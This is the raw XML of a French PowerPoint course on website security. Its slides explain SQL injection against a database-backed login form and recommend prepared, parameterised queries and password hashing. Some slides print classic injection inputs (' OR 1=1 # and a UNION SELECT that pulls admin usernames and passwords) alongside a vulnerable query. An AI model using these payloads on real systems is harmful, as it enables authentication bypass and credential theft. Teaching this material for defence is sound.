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82" r:id="rId4"/>
    <p:sldId id="283" r:id="rId5"/>
    <p:sldId id="285" r:id="rId6"/>
    <p:sldId id="275" r:id="rId7"/>
    <p:sldId id="322" r:id="rId8"/>
    <p:sldId id="323" r:id="rId9"/>
    <p:sldId id="260" r:id="rId10"/>
    <p:sldId id="263" r:id="rId11"/>
    <p:sldId id="264" r:id="rId12"/>
    <p:sldId id="262" r:id="rId13"/>
    <p:sldId id="268" r:id="rId14"/>
    <p:sldId id="269" r:id="rId15"/>
    <p:sldId id="271" r:id="rId16"/>
    <p:sldId id="272" r:id="rId17"/>
    <p:sldId id="270" r:id="rId18"/>
    <p:sldId id="273" r:id="rId19"/>
    <p:sldId id="287" r:id="rId20"/>
    <p:sldId id="298" r:id="rId21"/>
    <p:sldId id="301" r:id="rId22"/>
    <p:sldId id="289" r:id="rId23"/>
    <p:sldId id="288" r:id="rId24"/>
    <p:sldId id="290" r:id="rId25"/>
    <p:sldId id="291" r:id="rId26"/>
    <p:sldId id="321" r:id="rId27"/>
    <p:sldId id="325" r:id="rId28"/>
    <p:sldId id="327" r:id="rId29"/>
    <p:sldId id="328" r:id="rId30"/>
    <p:sldId id="310" r:id="rId31"/>
    <p:sldId id="311" r:id="rId32"/>
    <p:sldId id="313" r:id="rId33"/>
    <p:sldId id="324" r:id="rId34"/>
    <p:sldId id="315" r:id="rId35"/>
    <p:sldId id="303" r:id="rId36"/>
    <p:sldId id="305" r:id="rId37"/>
    <p:sldId id="304" r:id="rId38"/>
    <p:sldId id="316" r:id="rId39"/>
    <p:sldId id="317" r:id="rId40"/>
    <p:sldId id="306" r:id="rId41"/>
    <p:sldId id="307" r:id="rId42"/>
    <p:sldId id="308" r:id="rId43"/>
    <p:sldId id="309" r:id="rId44"/>
    <p:sldId id="296" r:id="rId45"/>
    <p:sldId id="297" r:id="rId46"/>
    <p:sldId id="319" r:id="rId47"/>
    <p:sldId id="318" r:id="rId48"/>
    <p:sldId id="278" r:id="rId49"/>
    <p:sldId id="280" r:id="rId50"/>
    <p:sldId id="281" r:id="rId51"/>
    <p:sldId id="314" r:id="rId5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535" autoAdjust="0"/>
    <p:restoredTop sz="94660"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr>
        <p:scale>
          <a:sx n="70" d="100"/>
          <a:sy n="70" d="100"/>
        </p:scale>
        <p:origin x="354" y="4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fr-FR"/>
              <a:t>Modifiez le style du titre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B61BEF0D-F0BB-DE4B-95CE-6DB70DBA9567}" type="datetimeFigureOut">
              <a:rPr lang="en-US" dirty="0"/>
              <a:pPr/>
              <a:t>3/16/2023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fr-FR"/>
              <a:t>Modifiez le style du titre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3/16/2023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fr-FR"/>
              <a:t>Modifiez le style du titre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3/16/2023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fr-FR"/>
              <a:t>Modifiez le style du titre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3/16/2023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fr-FR"/>
              <a:t>Modifiez le style du titre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fr-FR"/>
              <a:t>Cliquez pour modifier les styles du texte du masque</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3/16/2023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fr-FR"/>
              <a:t>Modifiez le style du titre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fr-FR"/>
              <a:t>Cliquez pour modifier les styles du texte du masque</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3/16/2023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nchor="ct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fr-FR"/>
              <a:t>Modifiez le style du titre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3/16/2023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3/16/2023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3/16/2023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3/16/2023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fr-FR"/>
              <a:t>Modifiez le style du titre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3/16/2023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fr-FR"/>
              <a:t>Modifiez le style du titre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3/16/2023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3/16/2023</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hyperlink" Target="https://www.php.net/manual/fr/function.password-hash.php" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.php.net/manual/fr/ref.password.php" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.php.net/manual/fr/function.password-verify.php"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hyperlink" Target="http://pirate.siteperso.com/malware" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.example.org/fiche_produit.php?id=article5" TargetMode="Externa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hyperlink" Target="https://fr.wikipedia.org/wiki/Canal_de_communication" TargetMode="Externa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fr.wikipedia.org/wiki/Alice_et_Bob" TargetMode="Externa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developer.mozilla.org/fr/docs/Web/HTTP/Methods/OPTIONS" TargetMode="Externa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4.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ssi.gouv.fr/uploads/2013/05/anssi-guide-recommandations_mise_en_oeuvre_site_web_maitriser_standards_securite_cote_navigateur-v2.0.pdf" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ssi.gouv.fr/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ssi.gouv.fr/uploads/IMG/pdf/NP_Securite_Web_NoteTech.pdf" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide4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jpe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7642019-2D73-45D8-8F15-974B8C29FC2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>Sécurité des sites web</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25880344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7642019-2D73-45D8-8F15-974B8C29FC2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684212" y="685800"/>
            <a:ext cx="8001000" cy="842750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Attaque de la bd</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="ZoneTexte 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB883C54-C2A6-42BC-93E2-F32A3D580747}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="894513" y="2018700"/>
            <a:ext cx="3504333" cy="2862322"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
              <a:alpha val="65000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>L'injection SQL directe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>est une technique où un pirate modifie une requête SQL existante pour afficher des données cachées, ou pour écraser des valeurs importantes, ou encore exécuter des commandes dangereuses pour la base</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="ZoneTexte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24610DB5-D77A-4B69-B48B-BF0348CF73C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8072509" y="2018700"/>
            <a:ext cx="3504332" cy="2862322"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000">
              <a:alpha val="50000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Avec le manque de vérification des données de l'internaute et la connexion au serveur avec des droits de super utilisateur, le pirate peut créer des utilisateurs, et créer un autre super utilisateur.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="ZoneTexte 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{036F3D6E-E5B3-4D2B-909F-A0251E19D0FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4483511" y="2018700"/>
            <a:ext cx="3504332" cy="2862322"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
              <a:alpha val="50000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Les conséquences d'une faille SQL peuvent être multiples : du contournement de formulaires d'authentification au dump complet de la base de données en passant par l'exécution arbitraire de code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR"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099244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7642019-2D73-45D8-8F15-974B8C29FC2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684212" y="685800"/>
            <a:ext cx="8001000" cy="842750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Attaque de la bd</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="ZoneTexte 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFCBD333-7AD8-4F6A-A0F4-E0630ED2BA23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684212" y="1842714"/>
            <a:ext cx="9024867" cy="3970318"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Pour </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>une</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>requête</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> non </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>paramétrée</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, non </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>préparée</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SELECT * from admins WHERE login='$login' AND password='$password’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Saisir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>' OR 1=1 # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>dans le champ mot de passe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>requête</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>devient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SELECT * from admins WHERE login='' OR 1=1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Saisir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> UNION SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>UserName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, Password FROM admin #</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFC000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>La </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>requête</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>devient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>UserName,Password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> FROM admin WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>UserName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> LIKE '%a%' and Password LIKE '' UNION SELECT * FROM admin #'</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D96D85C9-9D53-4F20-AD9F-8964F7AD900A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9235873" y="2541357"/>
            <a:ext cx="2600688" cy="2972215"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7336878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7642019-2D73-45D8-8F15-974B8C29FC2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684212" y="685800"/>
            <a:ext cx="8001000" cy="842750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Attaque de la bd</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="ZoneTexte 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEAA2100-AFF2-496D-92EE-477453278F0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684212" y="1833462"/>
            <a:ext cx="10490974" cy="4062651"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000">
              <a:alpha val="25000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Préparer et paramétrer les requêtes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="2400" b="0" i="0" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>utiliser un hash sur les données sensibles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="fr-FR" sz="2400" b="0" i="0" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
